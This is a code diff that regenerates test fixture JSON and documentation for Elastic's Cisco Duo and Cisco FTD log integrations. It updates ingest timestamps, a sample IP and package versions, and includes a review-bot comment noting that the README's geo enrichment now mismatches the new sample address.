diff --git a/packages/cisco_duo/data_stream/offline_enrollment/_dev/test/pipeline/test-offline-enrollment.log-expected.json b/packages/cisco_duo/data_stream/offline_enrollment/_dev/test/pipeline/test-offline-enrollment.log-expected.json
index 7f6c510e152..272e6b9241e 100644
--- a/packages/cisco_duo/data_stream/offline_enrollment/_dev/test/pipeline/test-offline-enrollment.log-expected.json
+++ b/packages/cisco_duo/data_stream/offline_enrollment/_dev/test/pipeline/test-offline-enrollment.log-expected.json
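Review bot: The sample event now reports `"ip": "89.160.20.156"` and `"address": "89.160.20.156"` under `source`, yet the surrounding context lines still carry `"number": 52`, `"region_iso_code": "US-CA"` and `"region_name": "California"`, so the ASN and geo enrichment shown no longer correspond to the address shown. The regenerated test-auth.log-expected.json in this same commit resolves that address to `"number": 29518`, `"name": "Bredband2 AB"` and Sweden, which is what a reader of the sample would expect to see. The untouched `"ingested": "2021-09-13T09:25:51Z"` suggests the file was search-and-replaced rather than regenerated; regenerating the sample event (or updating its `source.as` and `source.geo` fields by hand) would keep it consistent with the pipeline output, and the same mismatch is mirrored in the `docs/README.md` hunks further down.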
@@ -6,7 +6,7 @@
 "version": "1.11.0"
 },
 "event": {
- "ingested": "2021-09-13T18:13:45.782940725Z",
+ "ingested": "2021-12-14T14:39:15.762935151Z",
 "original": "{\"action\": \"o2fa_user_provisioned\",\"description\": \"{\\\"user_agent\\\": \\\"DuoCredProv/4.0.6.413 (Windows NT 6.3.9600; x64; Server)\\\", \\\"hostname\\\": \\\"WKSW10x64\\\", \\\"factor\\\": \\\"duo_otp\\\"}\",\"isotimestamp\": \"2019-08-30T16:10:05+00:00\",\"object\": \"Acme Laptop Windows Logon\",\"timestamp\": 1567181405,\"username\": \"narroway\"}"
 },
 "user": {
diff --git a/packages/cisco_duo/data_stream/summary/_dev/test/pipeline/test-summary.log-expected.json b/packages/cisco_duo/data_stream/summary/_dev/test/pipeline/test-summary.log-expected.json
index 9fd101d2557..b0b3ce6bbbe 100644
--- a/packages/cisco_duo/data_stream/summary/_dev/test/pipeline/test-summary.log-expected.json
+++ b/packages/cisco_duo/data_stream/summary/_dev/test/pipeline/test-summary.log-expected.json
@@ -1,12 +1,12 @@
 {
 "expected": [
 {
- "@timestamp": "2021-09-13T09:20:25.979604532Z",
+ "@timestamp": "2021-12-14T14:39:15.922670488Z",
 "ecs": {
 "version": "1.11.0"
 },
 "event": {
- "ingested": "2021-09-13T09:20:25.979604532Z",
+ "ingested": "2021-12-14T14:39:15.922670488Z",
 "original": "{\"response\":{\"admin_count\":6,\"integration_count\":5,\"telephony_credits_remaining\":473,\"user_count\":4},\"stat\":\"OK\"}"
 },
 "tags": [
@@ -22,12 +22,12 @@
 }
 },
 {
- "@timestamp": "2021-09-13T09:20:25.979613969Z",
+ "@timestamp": "2021-12-14T14:39:15.922673774Z",
 "ecs": {
 "version": "1.11.0"
 },
 "event": {
- "ingested": "2021-09-13T09:20:25.979613969Z",
+ "ingested": "2021-12-14T14:39:15.922673774Z",
 "original": "{\"response\":{\"admin_count\":3,\"integration_count\":9,\"telephony_credits_remaining\":960,\"user_count\":8},\"stat\":\"OK\"}"
 },
 "tags": [
diff --git a/packages/cisco_duo/data_stream/telephony/_dev/test/pipeline/test-telephony.log-expected.json b/packages/cisco_duo/data_stream/telephony/_dev/test/pipeline/test-telephony.log-expected.json
index fb63ea3cadd..663cf527a26 100644
--- a/packages/cisco_duo/data_stream/telephony/_dev/test/pipeline/test-telephony.log-expected.json
+++ b/packages/cisco_duo/data_stream/telephony/_dev/test/pipeline/test-telephony.log-expected.json
@@ -6,7 +6,7 @@
 "version": "1.11.0"
 },
 "event": {
- "ingested": "2021-09-13T18:13:46.452267128Z",
+ "ingested": "2021-12-14T14:39:16.074568052Z",
 "kind": "event",
 "original": "{\"context\":\"administrator login\",\"credits\":5,\"isotimestamp\":\"2021-07-22T12:59:30+00:00\",\"phone\":\"+121234512345\",\"timestamp\":1626958770,\"type\":\"phone\"}"
 },
@@ -28,7 +28,7 @@
 "version": "1.11.0"
 },
 "event": {
- "ingested": "2021-09-13T18:13:46.452275683Z",
+ "ingested": "2021-12-14T14:39:16.074571298Z",
 "kind": "event",
 "original": "{\"context\":\"verify\",\"credits\":1,\"isotimestamp\":\"2021-08-16T06:03:32+00:00\",\"phone\":\"+121234512345\",\"timestamp\":1629093812,\"type\":\"sms\"}"
 },
@@ -50,7 +50,7 @@
 "version": "1.11.0"
 },
 "event": {
- "ingested": "2021-09-13T18:13:46.452278281Z",
+ "ingested": "2021-12-14T14:39:16.074571820Z",
 "kind": "event",
 "original": "{\"context\": \"authentication\",\"credits\": 1,\"isotimestamp\":\"2020-03-20T15:38:12+00:00\",\"phone\":\"+121234512345\",\"timestamp\":1584718692,\"type\":\"sms\"}"
 },
diff --git a/packages/cisco_duo/docs/README.md b/packages/cisco_duo/docs/README.md
index 1444a0b82dc..94bb29b8f4f 100644
--- a/packages/cisco_duo/docs/README.md
+++ b/packages/cisco_duo/docs/README.md
@@ -179,7 +179,7 @@ An example event for `auth` looks as following:
 "auth": {
 "access_device": {
 "flash_version": "uninstalled",
- "ip": "169.232.89.219",
+ "ip": "89.160.20.156",
 "is_encryption_enabled": "true",
 "is_firewall_enabled": "true",
 "is_password_set": "true",
@@ -232,7 +232,7 @@ An example event for `auth` looks as following:
 "dataset": "cisco_duo.auth",
 "ingested": "2021-09-13T09:25:51Z",
 "kind": "event",
- "original": "{\"access_device\":{\"browser\":\"Chrome\",\"browser_version\":\"67.0.3396.99\",\"flash_version\":\"uninstalled\",\"hostname\":null,\"ip\":\"169.232.89.219\",\"is_encryption_enabled\":true,\"is_firewall_enabled\":true,\"is_password_set\":true,\"java_version\":\"uninstalled\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"os\":\"Mac OS X\",\"os_version\":\"10.14.1\",\"security_agents\":[]},\"alias\":\"\",\"application\":{\"key\":\"DIY231J8BR23QK4UKBY8\",\"name\":\"Microsoft Azure Active Directory\"},\"auth_device\":{\"ip\":\"192.168.225.254\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"name\":\"My iPhone X (734-555-2342)\"},\"email\":\"narroway@example.com\",\"event_type\":\"authentication\",\"factor\":\"duo_push\",\"isotimestamp\":\"2020-02-13T18:56:20.351346+00:00\",\"ood_software\":null,\"reason\":\"user_approved\",\"result\":\"success\",\"timestamp\":1581620180,\"trusted_endpoint_status\":\"not trusted\",\"txid\":\"340a23e3-23f3-23c1-87dc-1491a23dfdbb\",\"user\":{\"groups\":[\"Duo Users\",\"CorpHQ Users\"],\"key\":\"DU3KC77WJ06Y5HIV7XKQ\",\"name\":\"narroway@example.com\"}}",
+ "original": "{\"access_device\":{\"browser\":\"Chrome\",\"browser_version\":\"67.0.3396.99\",\"flash_version\":\"uninstalled\",\"hostname\":null,\"ip\":\"89.160.20.156\",\"is_encryption_enabled\":true,\"is_firewall_enabled\":true,\"is_password_set\":true,\"java_version\":\"uninstalled\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"os\":\"Mac OS X\",\"os_version\":\"10.14.1\",\"security_agents\":[]},\"alias\":\"\",\"application\":{\"key\":\"DIY231J8BR23QK4UKBY8\",\"name\":\"Microsoft Azure Active Directory\"},\"auth_device\":{\"ip\":\"192.168.225.254\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"name\":\"My iPhone X (734-555-2342)\"},\"email\":\"narroway@example.com\",\"event_type\":\"authentication\",\"factor\":\"duo_push\",\"isotimestamp\":\"2020-02-13T18:56:20.351346+00:00\",\"ood_software\":null,\"reason\":\"user_approved\",\"result\":\"success\",\"timestamp\":1581620180,\"trusted_endpoint_status\":\"not trusted\",\"txid\":\"340a23e3-23f3-23c1-87dc-1491a23dfdbb\",\"user\":{\"groups\":[\"Duo Users\",\"CorpHQ Users\"],\"key\":\"DU3KC77WJ06Y5HIV7XKQ\",\"name\":\"narroway@example.com\"}}",
 "outcome": "success",
 "reason": "user_approved",
 "type": "info"
@@ -245,12 +245,12 @@ An example event for `auth` looks as following:
 },
 "related": {
 "ip": [
- "169.232.89.219",
+ "89.160.20.156",
 "192.168.225.254"
 ]
 },
 "source": {
- "address": "169.232.89.219",
+ "address": "89.160.20.156",
 "as": {
 "number": 52,
 "organization": {
@@ -269,7 +269,7 @@ An example event for `auth` looks as following:
 "region_iso_code": "US-CA",
 "region_name": "California"
 },
- "ip": "169.232.89.219",
+ "ip": "89.160.20.156",
 "user": {
 "email": "narroway@example.com",
 "group": {
diff --git a/packages/cisco_duo/manifest.yml b/packages/cisco_duo/manifest.yml
index 08c16ac8ae8..8f1ffb8dfbb 100644
--- a/packages/cisco_duo/manifest.yml
+++ b/packages/cisco_duo/manifest.yml
@@ -1,7 +1,7 @@
 format_version: 1.0.0
 name: cisco_duo
 title: Cisco Duo
-version: 0.2.0
+version: 0.2.1
 license: basic
 description: Collect logs from Cisco Duo with Elastic Agent.
 type: integration
diff --git a/packages/cisco_ftd/changelog.yml b/packages/cisco_ftd/changelog.yml
index 08468950ca6..fdd939e6373 100644
--- a/packages/cisco_ftd/changelog.yml
+++ b/packages/cisco_ftd/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.2.2"
+ changes:
+ - description: Regenerate test files using the new GeoIP database
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/2339
 - version: "1.2.1"
 changes:
 - description: Change test public IPs to the supported subset
diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json
index d6d4c3719df..f3e310d78a3 100644
--- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json
+++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json
@@ -57,7 +57,7 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-12-09T13:34:27.491792100Z",
+ "ingested": "2021-12-14T14:39:18.531654624Z",
 "original": "Apr 17 2020 14:08:08 SNL-ASA-VPN-A01 : %ASA-6-302016: Teardown UDP connection 110577675 for Outside:10.123.123.123/53723(LOCAL\\Elastic) to Inside:10.233.123.123/53 duration 0:00:00 bytes 148 (zzzzzz)",
 "code": "302016",
 "kind": "event",
@@ -134,7 +134,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-12-09T13:34:27.491797700Z",
+ "ingested": "2021-12-14T14:39:18.531657083Z",
 "original": "Apr 17 2020 14:00:31 SNL-ASA-VPN-A01 : %ASA-4-106023: Deny icmp src Inside:10.123.123.123 dst Outside:10.123.123.123 (type 11, code 0) by access-group \"Inside_access_in\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
@@ -203,7 +203,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-12-09T13:34:27.491802700Z",
+ "ingested": "2021-12-14T14:39:18.531657528Z",
 "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.123.123.123/6316 dst outside:10.123.123.123/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3afb522, 0x0]",
 "code": "106023",
 "kind": "event",
@@ -279,7 +279,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:27.491808700Z", + "ingested": "2021-12-14T14:39:18.531657919Z", "original": "Apr 17 2020 14:16:20 SNL-ASA-VPN-A01 : %ASA-4-106023: Deny udp src Inside:10.123.123.123/57621(LOCAL\\Elastic) dst Outside:10.123.123.123/57621 by access-group \"Inside_access_in\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -340,7 +340,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:34:27.491831500Z", + "ingested": "2021-12-14T14:39:18.531658301Z", "original": "Apr 17 2020 14:15:07 SNL-ASA-VPN-A01 : %ASA-2-106017: Deny IP due to Land Attack from 10.123.123.123 to 10.123.123.123", "code": "106017", "kind": "event", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json index 7c4b90f46d0..8803eebcee6 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json @@ -59,7 +59,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099034Z", + "ingested": "2021-12-14T14:39:19.188442907Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:192.168.98.44/8256", "code": "305011", "kind": "event", @@ -138,7 +138,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099043200Z", + "ingested": "2021-12-14T14:39:19.188447003Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:192.168.205.104/80 (192.168.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772)", "code": "302013", "kind": "event", 
@@ -224,7 +224,7 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:34:28.099049400Z", + "ingested": "2021-12-14T14:39:19.188447512Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:192.168.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I", "code": "302014", "kind": "event", @@ -309,7 +309,7 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:34:28.099055100Z", + "ingested": "2021-12-14T14:39:19.188447900Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:192.168.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I", "code": "302014", "kind": "event", @@ -394,7 +394,7 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:34:28.099060900Z", + "ingested": "2021-12-14T14:39:19.188448291Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:192.168.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I", "code": "302014", "kind": "event", @@ -479,7 +479,7 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:34:28.099066600Z", + "ingested": "2021-12-14T14:39:19.188448746Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:192.168.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I", "code": "302014", "kind": "event", 
@@ -564,7 +564,7 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:34:28.099072300Z", + "ingested": "2021-12-14T14:39:19.188449178Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:192.168.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I", "code": "302014", "kind": "event", @@ -649,7 +649,7 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:34:28.099078Z", + "ingested": "2021-12-14T14:39:19.188449568Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:192.168.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I", "code": "302014", "kind": "event", @@ -734,7 +734,7 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:34:28.099083800Z", + "ingested": "2021-12-14T14:39:19.188449956Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:192.168.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I", "code": "302014", "kind": "event", @@ -819,7 +819,7 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:34:28.099089600Z", + "ingested": "2021-12-14T14:39:19.188450352Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:192.168.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I", "code": "302014", "kind": "event", 
@@ -904,7 +904,7 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:34:28.099095400Z", + "ingested": "2021-12-14T14:39:19.188450766Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:192.168.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I", "code": "302014", "kind": "event", @@ -989,7 +989,7 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:34:28.099101600Z", + "ingested": "2021-12-14T14:39:19.188451322Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:192.168.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I", "code": "302014", "kind": "event", @@ -1074,7 +1074,7 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:34:28.099107400Z", + "ingested": "2021-12-14T14:39:19.188451729Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:192.168.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I", "code": "302014", "kind": "event", @@ -1159,7 +1159,7 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:34:28.099112400Z", + "ingested": "2021-12-14T14:39:19.188452114Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:192.168.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I", "code": "302014", "kind": "event", 
@@ -1244,7 +1244,7 @@ "severity": 6, "duration": 70000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:34:28.099115900Z", + "ingested": "2021-12-14T14:39:19.188452496Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:192.168.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I", "code": "302014", "kind": "event", @@ -1329,7 +1329,7 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:34:28.099120400Z", + "ingested": "2021-12-14T14:39:19.188452898Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:192.168.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I", "code": "302014", "kind": "event", @@ -1414,7 +1414,7 @@ "severity": 6, "duration": 70000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:34:28.099125600Z", + "ingested": "2021-12-14T14:39:19.188453555Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:192.168.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I", "code": "302014", "kind": "event", @@ -1499,7 +1499,7 @@ "severity": 6, "duration": 71000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:34:28.099130700Z", + "ingested": "2021-12-14T14:39:19.188454491Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:192.168.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I", "code": "302014", "kind": "event", 
@@ -1584,7 +1584,7 @@ "severity": 6, "duration": 30000000000, "reason": "SYN Timeout", - "ingested": "2021-12-09T13:34:28.099136500Z", + "ingested": "2021-12-14T14:39:19.188454907Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:192.168.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout", "code": "302014", "kind": "event", @@ -1666,7 +1666,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099140700Z", + "ingested": "2021-12-14T14:39:19.188455300Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1188", "code": "305011", "kind": "event", @@ -1745,7 +1745,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099145100Z", + "ingested": "2021-12-14T14:39:19.188455721Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:192.168.80.32/53 (192.168.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -1830,7 +1830,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.099148600Z", + "ingested": "2021-12-14T14:39:19.188456120Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:192.168.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148", "code": "302016", "kind": "event", @@ -1913,7 +1913,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099153Z", + "ingested": "2021-12-14T14:39:19.188456560Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:192.168.252.6/53 (192.168.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", 
@@ -1998,7 +1998,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.099158900Z", + "ingested": "2021-12-14T14:39:19.188457062Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:192.168.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164", "code": "302016", "kind": "event", @@ -2080,7 +2080,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099164300Z", + "ingested": "2021-12-14T14:39:19.188457467Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:192.168.98.44/8257", "code": "305011", "kind": "event", @@ -2159,7 +2159,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099170100Z", + "ingested": "2021-12-14T14:39:19.188457871Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773)", "code": "302013", "kind": "event", @@ -2242,7 +2242,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099175900Z", + "ingested": "2021-12-14T14:39:19.188458263Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:192.168.98.44/8258", "code": "305011", "kind": "event", @@ -2321,7 +2321,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099181700Z", + "ingested": "2021-12-14T14:39:19.188458700Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774)", "code": "302013", "kind": "event", 
@@ -2405,7 +2405,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099187500Z", + "ingested": "2021-12-14T14:39:19.188459094Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:192.168.238.126/53 (192.168.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -2489,7 +2489,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099193300Z", + "ingested": "2021-12-14T14:39:19.188459474Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:192.168.93.51/53 (192.168.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -2574,7 +2574,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.099199Z", + "ingested": "2021-12-14T14:39:19.188459858Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:192.168.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111", "code": "302016", "kind": "event", @@ -2658,7 +2658,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.099204700Z", + "ingested": "2021-12-14T14:39:19.188460245Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:192.168.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237", "code": "302016", "kind": "event", @@ -2740,7 +2740,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099210400Z", + "ingested": "2021-12-14T14:39:19.188460636Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:192.168.98.44/8259", "code": "305011", "kind": "event", 
@@ -2819,7 +2819,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099216200Z", + "ingested": "2021-12-14T14:39:19.188461117Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:192.168.225.103/443 (192.168.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775)", "code": "302013", "kind": "event", @@ -2902,7 +2902,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099222100Z", + "ingested": "2021-12-14T14:39:19.188461624Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1189", "code": "305011", "kind": "event", @@ -2981,7 +2981,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099227900Z", + "ingested": "2021-12-14T14:39:19.188462016Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:192.168.240.126/53 (192.168.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -3065,7 +3065,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099233600Z", + "ingested": "2021-12-14T14:39:19.188462399Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:192.168.44.45/53 (192.168.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -3150,7 +3150,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.099239300Z", + "ingested": "2021-12-14T14:39:19.188462780Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:192.168.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87", "code": "302016", "kind": "event", 
@@ -3234,7 +3234,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.099245Z", + "ingested": "2021-12-14T14:39:19.188463185Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:192.168.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221", "code": "302016", "kind": "event", @@ -3316,7 +3316,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099249100Z", + "ingested": "2021-12-14T14:39:19.188463567Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:192.168.98.44/8265", "code": "305011", "kind": "event", @@ -3395,7 +3395,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099253700Z", + "ingested": "2021-12-14T14:39:19.188463946Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:192.168.179.219/80 (192.168.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452)", "code": "302013", "kind": "event", @@ -3479,7 +3479,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.099259Z", + "ingested": "2021-12-14T14:39:19.188464331Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:192.168.157.232/53 (192.168.157.232/53) to inside:172.31.98.44/56132 